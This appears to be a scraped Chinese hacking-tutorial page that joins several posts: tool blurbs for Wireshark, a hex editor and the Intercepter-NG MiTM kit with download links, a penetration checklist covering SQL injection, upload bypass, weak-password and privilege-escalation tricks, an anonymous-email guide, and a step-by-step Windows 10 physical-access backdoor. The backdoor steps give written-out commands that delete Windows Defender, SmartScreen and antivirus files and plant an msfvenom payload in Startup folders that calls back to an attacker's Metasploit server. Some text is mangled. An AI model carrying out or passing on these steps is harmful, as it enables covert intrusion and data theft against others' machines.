Wireshark是世界上最重要和最广泛使用的网络协议分析仪。它可以让您在微观层面上看到网络上发生的事情,并且是许多商业和非营利企业,政府机构和教育机构的事实上(通常是法律上的)标准。由于全球网络专家的志愿者贡献,Wireshark的发展蓬勃发展,并且是GeraldCombs在1998年启动的项目的延续。Wireshark具有丰富的功能集,包括以下内容:深入检查数百种协议,并且一直在增加更多协议实时捕获和离线分析标准三窗格包浏览器多平台:在Windows,Linux,macOS,Solaris,FreeBSD,NetBSD和其他许多平台上运行可以通过GUI或通过TTY模式TShark实用程序浏览捕获的网络数据业界最强大的显示器滤波器丰富的VoIP分析读/写许多不同的捕获文件格式:tcpdump(libpcap),PcapNG,CatapultDCT2000,CiscoSecureIDSiplog,Microsoft网络监视器,NetworkGeneralSniffer®(压缩和未压缩),Sniffer®Pro和NetXray®,NetworkInstrumentsObserver,NetScreensnoop,NovellLANalyzer,RADCOMWAN/LAN分析仪,Shomiti/FinisarSurveyor,TektronixK12xx,VisualNetworksVisualUpTime,WildPacketsEtherPeek/TokenPeek/AiroPeek等等使用gzip压缩的捕获文件可以动态解压缩实时数据可以从以太网,IEEE802.11,PPP/HDLC,ATM,蓝牙,USB,令牌环,帧中继,FDDI等读取(取决于您的平台)许多协议的解密支持,包括IPsec,ISAKMP,Kerberos,SNMPv3,SSL/TLS,WEP和WPA/WPA2可以将着色规则应用于数据包列表,以便进行快速,直观的分析输出可以导出为XML,PostScript®,CSV或纯文本

2019-6-22 35 0
黑客教程

HeliumHexEditor是一款先进的轻量级便携式十六进制编辑器。它允许编辑:-文件-进程内存-内核内存(虚拟和物理)-磁盘和分区-S-Records和IntelHex它包含以下功能:书签,结构解析器,加密,反汇编,二进制比较,连接,拆分,多个数据操作,搜索和替换,字符串搜索。普通用户可能会对功能的数量感到有些不知所措,但应用程序的内置和在线文档部分应该可以帮助任何人立即掌握其功能。文档部分涵盖了从庞大的工具栏到状态栏的角色,帮助用户熟悉一系列键盘快捷键,如何在多个可用视图之间切换,以及如何打开进程内存或内核内存等所有内容。考虑到所有因素,HeliumHexEditor是一个全面的十六进制编辑器,提供的方式比最初显示的更多。有了一些适当的文档时间,即使是最新手的用户也可以使用它,同时对更高级的用户仍然非常有吸引力。正如其名称所述,HeliumHexEditor是一个全面但非常轻量级的十六进制编辑器,允许用户编辑文件,处理内存,内核内存(虚拟和物理),磁盘和分区,以及S-records和IntelHex文件。功能丰富,轻巧,可移植的十六进制编辑器最重要的是,值得注意的是,这个十六进制编辑器拥有大量有用的功能,包括支持多个选项卡的GUI,非常适合即使是最高级的用户。由于该应用程序是可移植的,因此用户可以毫不费力地直接在其计算机上运行它,而无需任何安装或先决条件。对于那些在旅途中想要拥有可靠的十六进制编辑器的用户来说,这也是一个非常好的选择。可能需要一点时间习惯一旦启动,用户就会受到一些基本的GUI的欢迎。最引人注目的GUI元素是应用程序的顶部工具栏,它包含所有功能并提供对收费的访问,例如书签,结构解析器,加密,反汇编,二进制比较,连接,拆分,搜索和替换以及各种数据操作。

2019-6-22 23 0
黑客教程

Intercepter-NG是一个多功能网络工具包,包括一个用于黑客攻击的Android应用程序,主要目的是从网络流中恢复有趣的数据并执行不同类型的MiTM攻击。具体指的是Intercepter-NG控制台版,它适用于一系列系统,包括NT,Linux,BSD,MacOSX,IOS和Android。Windows版本是功能最强大的版本,但Android应用程序也相当方便。Intercepter-NG-用于黑客功能的Android应用程序嗅探密码或类型的哈希:ICQ,IRC,AIM,FTP,IMAP,POP3,SMTP,LDAP,BNC,SOCKS,HTTP,WWW,NNTP,CVS,TELNET,MRA,DC++,VNC,MYSQL,ORACLE,NTLM,KRB5,RADIUS嗅探聊天消息:ICQ,AIM,JABBER,YAHOO,MSN,IRC,MRA从以下位置重建文件:HTTP,FTP,IMAP,POP3,SMTP,SMB混杂模式,ARP,DHCP,网关,端口,智能扫描捕获数据包和捕获后(离线)分析,RAW模式通过RPCAP守护程序和PCAPOverIP捕获远程流量NAT,SOCKS,DHCPARP,DNSoverICMP,DHCP,SSL,SSLSTRIP,WPAD,SMBRelay,SSHMiTMSMB劫持,LDAP中继,MySQL负载数据注入ARPWatch,ARPCage,HTTPInjection,Heartbleedexploit,KerberosDowngrade,CookieKillerDNS,NBNS,LLMNR欺骗适用于基于WindowsNT的系统(2K\XP\2k3\Vista\7\8)。其他Android黑客应用程序包括:-劫持者-掠夺者为AndroidWifi黑客应用程序-BootStomp-查找AndroidBootloader漏洞你可以在这里下载Intercepter-NG:视窗:github.com/intercepter-ng/mirror/raw/master/Intercepter-NG.v1.0.zip安卓:github.com/intercepter-ng/mirror/raw/master/Intercepter-NG.2.0.apk严禁非法操作,不可触犯大陆法律,一个黑客创业者;官方

黑客教程

针对新手写一点渗透的小思路、小技巧,主要讲的是思路,所有不会太详细。经常逛一些好的博客或者门户站,坚持下来,每天学一点思路,你会积累到很多东西,记住:技术需要时间沉淀。(一)针对网站程序,不考虑服务器。一、查找注入,注意数据库用户权限和站库是否同服。二、查找XSS,最近盲打很流行,不管怎样我们的目的是进入后台。三、查找上传,一些能上传的页面,比如申请友链、会员头像、和一些敏感页面等等,注意查看验证方式是否能绕过,注意结合服务器的解析特性,比如典型的IIS6.0、阿帕奇等。四、查找编辑器,比较典型的ewebeditor、fckeditor等等。五、查找phpmyadmin等管理程序,可以尝试弱口令,或者寻找其漏洞。六、百度、谷歌搜索程序公开漏洞。七、猜解文件,如知道某文件为admin_login.php,我们可尝试admin_add.php、admin_upload.php文件是否存在,也可以谷歌搜索site:exehack.netinurl:edit等等,很多时候可以找到一些敏感文件,接着看是否验证权限或能否绕过验证。八、会员注册、修改、删除、评论等一切需要操作数据库的地方记得加单引号之类查看是否存在insert、update等类型注入。九、会员或低权限管理登陆后可抓包分析,尝试修改超级管理员密码,权限提升。十、通常有下载功能的站我们可以尝试修改下URL文件名,看能否下载站点敏感文件,如数据库配置文件等,数据库不可外连情况下可以尝试数据库密码登陆后台,也可下载上传、登陆验证等文件进行代码审计。十一、备份文件和后门,某些主站子目录存在分站,比如www.hackdig.com/software,我们可以尝试www.hackdig.com/software.zip/zip等压缩文件是否存在,可能就是子站的源码。也有一些站类似这样www.hackdig.com/old/,一般都是以前的老站,通常老站会比较容易拿。还有就是数据库备份、前人的后门等,具体这些目录上的东西就要看你的字典了。十二、0day漏洞,不管是别人给你的,还是自己挖的,总之好使就行。十三、。。。(二)针对服务器一、通常先扫下服务器开放的端口,再考虑对策。二、比较常见的解析漏洞,比如IIS6.0、阿帕奇、nginx/IIS7.0(php-fpm)解析漏洞等,还有就是cer、asa之类的解析,.htaccess文件解析配置等。三、弱口令和everyone权限,先扫描服务器开放的端口,比如21对应的FTP、1433对应的MSSQL、3306对应的MYSQL、3389对应的远程桌面、1521对应的Oracle等等,平时可以多搜集下字典,有时候效果也是不错的(通常在cain嗅探的时候,经常能嗅到别人不停的扫…很蛋疼)。四、溢出,这点要看系统补丁和服务器使用的软件等等,比如FTP等工具,这里不详解。五、针对一些服务器管理程序,比如tomcat、jboss等等,这种比较常见于大中型的站点服务器。六、IIS、apache等各种漏洞,这个要平时多关注。七、目录浏览,服务器配置不当,可直接浏览目录。八、共享…九、。。。(三)针对人,社工社工在渗透中通常能起到惊人的效果,主要还是利用人的弱点,博大精深,这里不详细讨论,注意平时多看一些社工文章,学习一些思路、技巧。(四)迂回战术,旁注和C段一、旁注,针对旁站,我们可以运用到上面说到的方法,这里不多说。二、C段,基本想到C段就会想到cain,针对C段的站点和服务器,结合上面说的针对目标站、服务器、人、旁站的思路,一个道理,当然如果你的目的仅仅是黑站的话,不妨试试NetFuke之类。三、…(五)提权常用手段一、使用系统溢出提权EXP,这类在提权中最常用,使用的方法大都一致,比如比较常见的巴西烤肉、pr等等,溢出提权通常在Linux上也利用的比较多,注意多收集EXP。二、第三方软件提权,主要还是利用服务器上安装的第三方软件拥有比较高的权限,或者软件的溢出漏洞,比如典型的mssql、mysql、serv-u等等,还有各种远程控制软件,比如pcanywhere、Radmin这类。三、劫持提权,说到这个,想必肯定会想到lpk.dll这类工具,有时候在蛋疼怎么都加不上账户的时候,可以试试劫持shift、添加开机启动等等思路。四、弱口令技巧,我们可以看看有木有什么hack、或者隐藏账户之类的,一般这种用户密码都比较简单,可以尝试下弱口令,还有之前说过的各种数据库、远程控制软件、FTP软件的弱口令,没办法的时候就去扫扫碰碰运气吧。五、信息收集,注意翻下硬盘各种文档,说不定各种密码就在里面。在内网渗透时,信息收集是非常重要的,记得拿下服务器了GET一下明文密码,德国那个mimikatz不错,还有就是域、ARP。。。貌似扯多跑题了。六、社工…不多说。暂时总结到这里,渗透博大精深,不是这么几段字就能说清楚的,具体还是要看具体情形,随机应变。一定要养成在渗透过程中信息收集的好习惯,特别是针对大中型站点,注意收集子站域名、目录、密码等等敏感信息,这对于我们后面的渗透非常有用,内网经常弱口令,同密码比较多。很多时候,或许一个主站就死在子站的一个小漏洞上。

黑客教程

公告:百度搜到的工具不再提供下载,从事安全工作如果没有探索精神,我想,不要再说自己喜欢。设备的Wi-Fi安全和隐私一个软件包中最快的V皮N和Wi-Fi安全性。安装免费杀毒软件并感觉安全的日子已经一去不复返了。今天的威胁来自许多来源,不仅侵入您的计算机,还损害您的在线隐私。WifiProtector使用先进的系统和强大的加密技术,确保您再次感到安全。使用方便简单易用,但功能强大的安全应用程序可以保护您的防病毒软件停止在线。银行级安全您的所有网页浏览都受256位加密保护,可以保护您免受身份盗用,不安全的热点等攻击。隐私和匿名隐藏您的真实IP地址,让您匿名,自由地私下使用互联网,不受任何限制或审查。超快的V皮N速度我们的全球网络基础设施提供适合视频流的高速。这个怎么运作WifiProtector通过入侵检测,Wi-Fi安全设置扫描和V皮N保护为不安全的Wi-Fi热点提供保护。所有这些都包含在一个功能强大的软件包中。WifiProtector有两个版本。Basic版本是完全免费的,并且由不引人注目的广告支持。完整版需要按月订阅,并为您的VPN提供国家选择,更快的浏览和无广告中断。你可以在这里买到完整版。V皮N保护V皮N(虚拟专用网络)可以被视为您的计算机和Internet之间的私有隧道。这有效地使您与计算机之间的所有通信对您周围的人“隐形”。事实上,您的数据(信息)已加密,对其他任何人都毫无意义。WifiProtectorV皮N使用OpenV皮N技术,这是目前最安全的V皮N协议。与其他V皮N产品不同,WifiProtector完全免费提供V皮N保护。此外,WifiProtector提供“自动保护模式”,确保为您自动启用保护。同样,如果WifiProtector检测到入侵者,则计算机上的所有通信都将被隔离,攻击者将无法看到您的互联网活动。选择您的的地区社交网络(例如被某区阻止)限制从公司外部访问的业务网络新闻服务仅限于东道国电视服务仅限于东道国我们提供全面保护,使用虚拟专用网络对您发送或接收的数据进行加密,并通过位于世界各地的安全服务器将其发送到Internet。我们通常选择最接近您的服务器,以提供最佳的Internet速度。但是,能够选择特定国家/地区有很大的优势,我们允许您在付费版本中执行此操作。黑客警报WifiProtector持续监控您的Wi-Fi和有线网络是否有企图进行黑客攻击(陌生人或未经授权的用户尝试访问您的设备)。WifiProtector甚至可以识别使用“欺骗”的攻击,使它们看起来像是来自可靠的设备。当新设备连接到您的网络时,您将立即收到通知,并且如果设备被检测为尝试入侵或入侵,您将收到警报。您应该通知系统管理员,然后系统管理员将采取必要的步骤来阻止入侵者。这可以确保您的设备和敏感信息的安全。WifiProtector可以做到这一点,因为它知道如何检测ARP(地址解析协议)欺骗攻击。当他们“欺骗”网关的MAC地址时,这些可能会特别危险,但是当他们模仿其他可信设备时,它们同样严重。一旦检测到此类攻击,我们就会启动VPN保护,并且所有离开或进入您计算机的数据都会被安全加密,从而避免入侵者的干预。WI-FI安全扫描需要正确配置每个Wi-Fi路由器,以确保只有授权用户才能访问它。对于需要私有的Wi-Fi热点的商业和家庭用户来说尤其如此。WifiProtector将扫描您当前的网络并显示任何安全问题,例如不安全的身份验证协议和弱密码。与此同时,您将获得过去所有已连接网络的类似安全报告。即使您没有安装或运行WifiProtector,您也会收到这些报告-您将立即知道哪些热门地点不安全。WI-FI网络保护如果您的Wi-Fi网络不安全,您有两种方法可以解决它。如果是您的家庭Wi-Fi网络,您可以从WifiProtector安全报告中学习,并通过重新配置路由器来提高安全性。为此,您需要一根网线和路由器的登录信息(由您的Internet服务提供商提供)。如果您无权更改设置或者您没有路由器的必要登录信息,那么您可以使用WifiProtector提供的VPN保护来保护自己。黑客新闻黑客工具创业干货创业孵化下载

黑客教程

如果您需要发送与您的日常身份无关的电子邮件,这是一个策略。是的,你可以在网上匿名。至少在合适的条件下,但这并不一定容易。您登录的帐户以及希望更好地定位广告的第三方广告公司会不断跟踪您的日常身份。这意味着您最喜欢的浏览器通常充满了跟踪器,以便密切关注您在线进行的操作。此外,谁知道您的互联网服务提供商,被动(或主动)政府数据收集以及各种其他闯入者正在发生什么?最重要的是你必须采取慎重的步骤,以确保在线匿名。也就是说,如果你想要的只是一个匿名的电子邮件帐户,你的专业或家庭生活中没有人知道,那就不那么难了。尽管如此,在您确保连接安全或在错误的时间访问您的非匿名身份之前,只需登录电子邮件帐户就可以了解所有问题,并且您的身份可能会被泄露。本教程将引导您完成必要的步骤,并根据您想要采取的步骤,您可以使用其中的所有建议,或仅将其削减到您需要的部分。我们将解释为什么每一步都是必要的,以帮助指导您的决策。第1步:获取匿名工作区如果你想保持匿名,最好的办法是拥有一个单独的数字工作空间,仅用于你的秘密身份。这样你的日常会计师和你的匿名举报/先生之间就没有交叉的风险。机器人身份。如果您只是在日常机器上使用常规浏览器设置一个帐户,那么只需要在您的PC和哎呀!你不愿透露姓名。这里有一些选择。1级:在USB拇指驱动器上安装TOR浏览器。如果您的赌注非常低(例如,如果您的帐户被发现它不是世界末日),那么运行USB驱动器的TOR可能就是您所需要的。TOR浏览器是连接到洋葱路由器(TOR)网络的Firefox版本。在将您带到开放的互联网之前,此系统会通过多个节点(计算机)传递您的Internet连接。使用TOR时,您的真实IP地址会变得模糊不清。此外,默认情况下,TOR浏览器不会保存您的浏览历史记录,从而保密您的活动。为了保持TOR尽可能安全,请查看Tor项目的提示,了解如何在线保持安全和私密。另请参阅我们关于TOR浏览器的教程以获取更多信息。第2级:更高级的用户可以运行整个操作系统,例如保护隐私的Linux发行版,关闭拇指驱动器。这就像拥有完全独立的计算机而没有第二个物理设备。同样,这就是在您的真实身份和匿名帐户之间放置防火墙。3级:如果你是超偏执或被发现意味着非危及生命的灾难,那么考虑一个完全独立的笔记本电脑,它只用于你的秘密身份。最好是以现金或一次性签证礼品卡支付您的设备,以避免将笔记本电脑连接回您的办公室居住角色。笔记本电脑应该运行加密的Linux变体,但如果您必须使用Windows10,请确保使用本地帐户激活您的计算机,请在安装过程中关闭所有可能的跟踪方法,并且不要使用Cortana。此外,不要在此设备上安装不必要的软件,也不要在正常生活中登录帐户,无论如何。我们的想法是在笔记本电脑上尽可能少地提供额外信息。额外的应用程序以及将您的匿名生活与您的实际生活混合在一起是很大的“无关紧要”。此外,不要忘记在网络摄像头上放一些胶带或一张纸。这是超偏执的,但是马克扎克伯格甚至做到了。第2步:位置,位置,位置您永远不想在家或工作中访问您的秘密身份。这只是一个坏主意,因为有可能泄露可以追溯到您的互联网协议(IP)地址。同样,它必须采取一些非常先进的调查来找到这个,但匿名的一部分是确保没有人知道你到底在哪里。将您的匿名活动保存到当地的咖啡馆,图书馆或其他提供公共Wi-Fi的地方。如果你真的是偏执狂,那么选择一个与你的日常地点不太接近的地方也许是一个好主意。对于超级偏执狂:另一个重要的注意事项是,你正在使用的其他设备也可以让你离开。为了使物品尽可能分开,请将手机留在家中,或至少将其关闭,并(如果可以的话)取出电池。第3步:使用TOR或VPN(但不是真的)一旦你有一个不是你家的地方或工作,你可以通过电子邮件发送电子邮件,是时候连接到互联网了。可是等等!在此之前,您需要使用TOR网络或高质量VPN。如果您已经通过USB拇指驱动器使用TOR浏览器,则跳过此部分,因为您已经在执行此操作。对于其他人,我们仍然建议使用TOR而不是VPN,因为TOR网络的美妙之处在于您不必信任任何人。TOR的工作原理是在让您进入开放网络之前,通过多个服务器运行加密连接。这样就很难将你追溯到你的真实位置,只有让你进入网络的最终服务器真正有机会监视你的活动-除非出现无法预料的攻击,就是这样。但是,如果VPN是更适合您的选择,请选择接受现金的VPN,具有保护用户权限的长期记录,然后再使用TOR。说真的,为了使用秘密电子邮件帐户,您最好不愿透露姓名是TOR。如果您使用信用卡支付VPN费用,那么您就可以追踪,如果VPN被迫以某种方式跟踪您,那么您也面临风险。没错,这些都是最糟糕的情况,但这是重要的原则。尽可能保持匿名,使用TOR。但是TOR本身并不是一个神奇的子弹。TOR浏览器默认使用电子前沿基金会的所有浏览器扩展HTTPS。该扩展将保护您在退出节点和您要访问的网站之间通过SSL/TLS建立连接。这应该足以让任何潜在的窥探出局。请记住,使用TOR浏览器时,只有该应用程序连接到TOR网络。如果您开始使用Spotify桌面应用程序同时播放音乐,则不会通过TOR进行。第4步:创建电子邮件帐户有很多匿名电子邮件选项,如GuerrillaMail和Secure-Email.org。我们稍后会讨论这个问题,但我们假设您需要一个标准的电子邮件地址,其中包含收件箱,已发送文件夹以及其他所有内容。我们建议使用ProtonMail。它是少数众所周知的电子邮件服务之一,您可以使用它而无需提供一些备用标识,如电话号码或辅助电子邮件。此外,ProtonMail默认是加密的,并且它的网站的TOR可访问版本位于https://protonirockerxow.onion/,使其成为一个可靠的选择。第5步:前进并记住这些提示现在您已经通过TOR在一个单独的工作空间上连接,并且您已经设置了电子邮件,现在是时候进行消息传递了。当您撰写电子邮件时,请注意不要说任何可能揭示您的实际身份的内容,并且在使用您的特殊匿名设置时切勿连接到现实生活中的任何内容。记住您的匿名电子邮件帐户的用户名和密码也是一个好主意。不要将它们放在您日常生活中的密码管理器中,不要在笔记本电脑上留下可能脱落的便签,也不要在其他任何地方使用您的ProtonMail用户名和密码。如果你需要一个关于为什么这很重要的课程,请阅读关于执法如何赶上丝绸之路创始人RossUlbricht。这一切都始于Ulbricht多年前使用的一个模糊的用户名,并且他与他的实际身份相关联。请记住,所有这一切都是为了撤消所有隐私保护措施。此外,不要开始专门销售毒品和武器的数字黑市-这只是在寻找麻烦。奖金部分:匿名电子邮件服务当您需要做的只是发送一封匿名电子邮件时,条件就不同了。首先,您不一定要打扰辅助笔记本电脑。因此,我们假设您在USB记忆棒上使用TOR浏览器,但您仍然无法从家中或办公室连接。那么呢?访问GuerillaMail.com。您将获得一个永久性的一次性临时电子邮件地址。任何人都可以向此地址发送电子邮件,但邮件仅在收件箱中持续一小时。这是一个方便的服务,如果您要做的就是发送一封没有响应的电子邮件或者可能需要一个响应,但它不是交易多个响应的最佳选择。事实上,任何拥有您正在使用的GuerillaMail地址的人都可以监控收件箱,因为不需要用户名或密码。GuerillaMail通过提供两个电子邮件地址来解决这个问题:实际发送到收件箱的电子邮件地址,以及您向其他人发送的“加扰”地址。这是一个巧妙的技巧,但它已经增加了一些不需要这么难的东西的复杂性。我们建议只在标准电子邮件服务上保留一个秘密身份。此外,GuerrillaMail实际上是关于在已经溢出的收件箱中减少垃圾邮件,而不一定是维护一个秘密的电子邮件帐户。

2019-6-1 33 0
黑客教程

攻击者在远程私有服务器上配置完metasploit,创建了自动化资源脚本和生成了简单地payload之后,只要能够物理接触他人的电脑几分钟,他就可以远程控制别人的电脑了,即使电脑已关机也无济于事。如果你还不太明白,请务必参考我的上一篇文章:设置liveUSB和payloadUSB。不然,你可能会有些蒙圈,不知道我下面会说到的两个USB从何而来。完成上一篇文章中的一系列操作之后,这篇文章将继续讲解如何完成接下来的攻击环节。两个U盘都要插入到已关闭的目标系统中,确保关闭了Windowsdefender和其他安全软件,并且payload会被保存在正确的位置上。跟之前一样,无论你是白帽子,渗透测试者,安全研究者,或者只是一个普通的windows10用户,在本文的文末,我们将会讨论一些防御性的措施。Step1使用liveUSB启动目标设备因为在本次攻击中,需要用到两个USB端口,所以如果目标设备只有一个USB口的话,你可能需要带一个USBhub,这样就可以连接liveUSB和payloadUSB两个U盘了。当目标系统完全关机之后,所有连接到电脑的U盘和外设都应该弹出。此时我们会将使用Ethcer工具制作的liveUSB插入到win10目标电脑中。在电脑启动过程中,要进入启动管理器,需要按F12,F10,或者是Fn+F2,也可能是其他键组合。由于不同的电脑制造商处理BootLoader的方法不同,因此无法确定的说就是哪两个键来启动BootLoader,大家根据自己的个人电脑上网查查启动BootLoader快捷键。下图就是一个典型的启动管理器界面,显示了启动选项,不过目标电脑的启动管理器可能并不是长这样。选择“USBboot”选项。然后,kali(或者不管是其他的什么Linux版本)会弹出一个登陆窗口,默认用户名root,密码toor。Step2安装Windows卷大多数电脑的驱动器名(或者是卷名),可能叫做Windows或Windows10。大多数系统只有一个内部硬盘驱动器,因此不难确定卷名。我们需要记住卷的名字,在教程的后面我们会用到它。双击位于kali桌面上的驱动器来安装Windows卷。安装完之后,我们就可以访问硬盘上的文件和目录了。kali管理器会自动弹出并显示硬盘上的内容。在下面的例子中,可以看到“Users”和“Files”目录是完全可以访问的。Step3插入payloadUSB接下来,将payloadUSB插入到目标计算机中,桌面上会出现一个新的驱动器,双击它来安装,并记下文件地址栏中的卷名。在下一步中,我们要用到这个卷名。Step4禁用计算机防御下一步,关闭WindowsDefender,Smartscreen和杀毒软件,这个是可选项。禁用计算机的防御系统并不会破坏操作系统,也不会再重启时造成致命的错误。但应用程序托盘中少了杀毒软件的图标可能会引起用户的怀疑。完成这些操作后,去检查Windowsdefender设置也可能让用户和IT专业人员注意到某些安全问题。我们也可以选择一种入侵行为不那么明显的方法,比如DNS攻击,这让攻击者能够进行网络钓鱼攻击,并且只涉及到修改单个的文本文件。在本篇文章中,我将会展示对于关机的电脑会造成多大的损害。禁用WindowsDefenderWindowsdefender是Windows操作系统自带的防病毒和清除恶意软件的组件。该组件包含很多的安全功能,比如实时的安全代理,可以监控操作系统中比较常用的位置,检测它们是否发生改变,通常这些位置容易被攻击者篡改。USB和硬盘会自动挂载在/media/username/目录下。我们可以使用find命令来查找包含Windowsdefender文件的目录。打开终端,输入以下命令:find/media/root/-typed-iname*Windows\Defender*-typed参数意思是只查找目录,-iname参数表示忽略大小写,所以这条命令会找到名为“WindowsDefender”,“windowsdefender”或者是“WiNdOwsdEfEnDeRs”的目录。前后两个通配符*表示查找所有包含Windowsdefender字符的目录,不管该字符是在目录的开头,结尾还是中间。从上图中可以看到,命令执行结束后,查找到6个包含Windowsdefender的目录。使用下面这条命令可以删除这些目录:find/media/root/-typed-iname*Windows\Defender*-execrm-rf{}\;这条命令比上一条命令多了-execrm-fr{}\,意思就是找到目录后自动删除。执行完之后,再运行第一条命令,就应该找不到包含Windowsdefender目录了。禁用Windowssmartscreensmartscreen是微软开发的安全层。它作为“防恶意软件服务”进程在后台运行,并扫描应用程序和文件来查找微软数据库中标记的恶意软件。即使禁用了Windowsdefender,smartscreen还是能够识别出恶意的payload并进行隔离。移除smartscreen,使用下列命令:find/media/root/-iname*smartscreen.exe*-execrm-rf{}\;这样,所有包含smartscreen.exe的文件和目录都被删除了。禁用第三方安全软件(杀毒软件)avast是一款非常优秀的杀毒软件,适用于各个平台,被认为是top5的杀毒软件,所以为了演示,我已经在目标计算机上安装了这款杀软。当然,我们还是要删除所有包含avast的目录和文件,使用下面这条命令:find/media/root/-iname*avast*-execrm-rf{}\;如果不知道目标计算机使用了什么杀软,可以手动浏览“ProgramData”和“ProgramFiles”目录,或者使用find命令来遍历。find/media/root/-iname*SearchTermHere*现在,所有的杀软程序都已经目标计算机上清除了,此时这个电脑非常不安全,任何的payload都可以攻击它。Step5将payload保存到自启动文件夹Windows有一个自启动文件夹,该文件夹里的程序都会在开机登录进系统时自启动,这种做法是为了方便,用户可以随时将合法程序的快捷方式(如浏览器,Word,播放器等)和脚本等拖入到该文件夹中。攻击所有用户有两个自启动目录可以用来自动执行payload,要想运行payload攻击计算机中的所有用户,payloadUSB中的这个“security.exe”payload需要存放在下面的这个Windows目录中:C:\ProgramData\Microsoft\Windows\StartMenu\Programs\StartUp下面的cp命令可以复制payloadUSB中的msfvenompayload到“AllUsers”的自启动目录中。cp/media/root/USB#2VOLUMENAME/Windows\Security.exe/media/root/WINDOWSVOLUMENAME/ProgramData/Microsoft/Windows/Start\Menu/Programs/StartUp/上面命令中的USB2和Windows卷名需要根据你自己的实际情况进行修改。ls命令查看目录下的文件,以确保security.exe这个payload是否成功复制。攻击一个用户如果目标是设备上的单个用户,那么攻击者可能会使用下面的启动文件夹:C:\Users\TARGETUSERNAME\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup下面的命令用来复制payload到目标用户的启动文件夹中,这样就只会对这个用户造成影响:cp/media/root/USB#2VOLUMENAME/Windows\Security.exe/media/root/Users\TARGETUSERNAME/AppData/Roaming/Microsoft/Windows/Start\Menu/Programs/Startup/Step6卸载Windows卷上面那些步骤就是关于如何删除防病毒软件和插入msfvenompayload。在kali关机之前,手动卸载Windows卷也是非常重要的。在测试这次攻击过程中,我发现当我没有卸载Windows卷就强制关机时,有时候会导致卷无法保存对硬盘驱动的修改(也就是关机后,msfvenom没有正确的保存到卷中)。要正确的卸载Windows卷,右键单击这个驱动器,在弹出的菜单栏中选择卸载卷。Windows卷正常卸载后,关掉liveUSB,拿走U盘,然后离开计算机,就像什么都没发生一样,此时攻击已经完成。Step7执行后渗透操作当目标用户开启目标计算机后,位于启动文件夹中的msfvenompayload会自动运行,并且回连到攻击者的服务器上(当然了,目标计算机需要联网)。下图可以看到已经建立了一个新的连接:目标计算机只要一起动,它就会尝试的去连接运行着metasploit的VPS。查看已经建立的连接,在终端中输入sessions即可:当被入侵计算机成功连接到metasploitVPS时,会自动分配一个ID号。要连接新创建的会话,只要输入-i参数即可:sessions-i1可以看到创建了一个新的meterpreter连接,这样攻击者就可以直接与被入侵的主机进行交互了。在我们这个入侵win10的后续系列文章中,我会讲到一些非常不错的后渗透技术,所以大家可以持续关注这个系列。如何防御硬盘攻击当谈到防御此类攻击时,虽然有时候似乎很难防御,但有几点防御措施还是不错的。启动BitLocker。这是微软提供的一种硬盘加密技术,启用了这个之后,本文中所演示的攻击就很难成功执行了。然而并没有什么卵用,之前已经有人写过文章如何绕过BitLocker加密了。所以它并非万无一失。使用veracrypt软件。veracrypt是一个跨平台的加密软件,支持全盘加密。想要更加深入了解veracrypt,请访问Lifehacker。最后一点,不要使用Windows操作系统。Windows本来就不是一个安全的操作系统。MacOS和基于Debain的操作系统默认提供了更优秀的硬盘加密方法。如果你的电脑物理安全存在问题,那么你可以考虑换操作系统了。

黑客教程

即使你的win10笔记本关机,3分钟之内,也可以被入侵。只需要在键盘上执行某些操作,就能移除电脑中的杀毒软件,创建一个后门,捕获网络摄像头图像和密码,以及其他比较敏感的个人数据。你现在可能会有疑惑,为什么攻击者要入侵我的个人电脑呢?答案很简单,任何计算机或者在线账户都是有价值的。虽然很多人觉得他们没什么东西可丢失或者可隐藏的,但是黑客的想法谁知道呢,可能他们就是想黑你,所以不要低估他们。通过入侵你的win10电脑,攻击者可以在你的电脑上搭建web服务器用来钓鱼,传播恶意软件,垃圾邮件,或者存储和发布其他的恶意内容。他们还可以收集你的联系人信息,以你的名义给他们发送垃圾邮件,获取虚拟商品,破坏你的名声,获取你所有的账户凭证,把你的电脑当成肉鸡进行僵尸活动等等。即使你的电脑上没有存储敏感信息,攻击者也会利用已经入侵的系统进行非法的活动,而这些非法活动都是直接与受害者相关联的,非法活动失败有可能导致罚款,诉讼,甚至是蹲监狱。当然,也有可能攻击者入侵的电脑并不是实际的目标。只是以一个跳板而已。如果电脑所有者在一家价值很高的大企业上班,那么这家大企业可能就是攻击者真正的目标。这台被入侵的电脑,连接到公司的网络就可以作为一台渗透设备了,攻击者就可以进行非法活动,或者是横向渗透到网络中的其他设备。理解攻击在这篇文章中,我将讲解攻击者在物理接触靶机的情况下,如何给靶机种后门。对于白帽子和渗透测试人员来说,这是一个不错的方法。当然,对于普通用户来说,知道这种方法也有利于防止这种攻击。大多数win10用户都不知道,即使电脑完全关机了,攻击者在不知道电脑开机密码的情况下,也是有办法可以看到电脑中的文件和目录的。执行这种攻击只要2个U盘就足够了。第一个U盘制作成可以启动靶机系统的“liveUSB”,第二个U盘用来存储会在靶机中执行的payload。在第一个U盘中制作完成liveUSB之后,它就不能再存储任何文件了(比如payload),所以我们才需要第二块U盘。这种攻击谁都可以执行,同事,邻居,酒店服务人员,室友,朋友,对象等任何人,只要有这两个U盘,并且能够物理接触电脑三分钟。攻击者甚至可以借助metasploit在电脑上留后门,这样一来,即使电脑在任何其他地方连接到不同的WiFi网络,攻击者都可以维持一个长期和远程的连接。Step1制作liveUSBLiveUSB是一个物理介质或者外部硬盘,里面包含了一个完整的系统,可以在一台电脑上启动,而不用启动电脑的内部操作系统。现在大多数的电脑和台式电脑都支持从liveUSB启动,没有进行任何的安全考虑。制作liveUSB的软件有很多,比较流行的是Rufus和LinuxLiveUSBCreator。不过,这里我推荐的是Ethcer,一个跨平台和开源的工具,这个工具让制作liveUSB更简单容易上手。这里我们建议使用轻量级的LinuxISO镜像,允许Ethcer更加快速的制作liveUSB。任何允许用户使用操作系统而不用安装的LinuxISO镜像都可以。当Ethcer执行完成之后,弹出USB,此时,这个USB就能够用来查看和修改已经关机的win10电脑上的敏感文件了。Step2设置VPS我们还需要一个VPS来设置metasploit监听,到时候被入侵的电脑会连接到这台服务器上。关于如何购买VPS这里我就不再啰嗦了。如果还有不清楚如何购买的,请参考我们之前的文章,选择最好的VPS提供商。基于debain的VPS,1G运存和1核CPU就可以运行metasploit了。Step3在VPS中安装metasploitmetasploit开发者写了一个简单地安装脚本,可以自动化安装metasploit整个过程。首先,我们要下载这个脚本,然后保存到本地,我们可以使用下列命令来实现:curlhttps://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb>msfinstall然后,确保脚本具有可执行权限,使用chmod命令来修改权限。sudochmod755ms